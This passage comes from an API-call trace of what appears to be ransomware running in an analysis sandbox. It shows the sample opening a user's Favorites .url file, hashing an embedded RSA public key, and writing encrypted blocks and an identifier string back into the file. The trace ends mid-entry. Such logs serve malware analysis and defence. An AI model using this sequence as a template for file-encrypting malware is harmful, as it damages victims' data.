[0198.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.702] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.705] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.705] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0198.706] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0198.711] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.711] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.714] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.714] ReadFile (in: hFile=0x558, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.716] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.716] ReadFile (in: hFile=0x558, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.716] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.716] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.716] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.716] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.717] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.717] CryptHashData (hHash=0x2cfe180, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.717] CryptGetHashParam (in: hHash=0x2cfe180, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.717] CryptGetHashParam (in: hHash=0x2cfe180, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.718] GetLastError () returned 0x0 [0198.718] CryptDestroyHash (hHash=0x2cfe180) returned 1 [0198.718] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.718] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.718] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.718] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.719] SetFilePointer (in: hFile=0x558, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b10 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b58 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0198.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.720] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3080 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.723] GetCurrentThreadId () returned 0x66c [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5f50 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.724] GetCurrentThreadId () returned 0x66c [0198.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0198.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3110 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0198.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3110 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b58 | out: hHeap=0x620000) returned 1 [0198.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.735] WriteFile (in: hFile=0x558, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.736] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.736] WriteFile (in: hFile=0x558, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.738] WriteFile (in: hFile=0x558, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: 